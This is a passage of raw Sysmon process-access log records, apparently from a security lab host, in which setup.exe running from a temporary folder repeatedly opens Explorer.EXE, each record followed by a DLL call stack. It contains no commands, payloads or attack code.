w64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
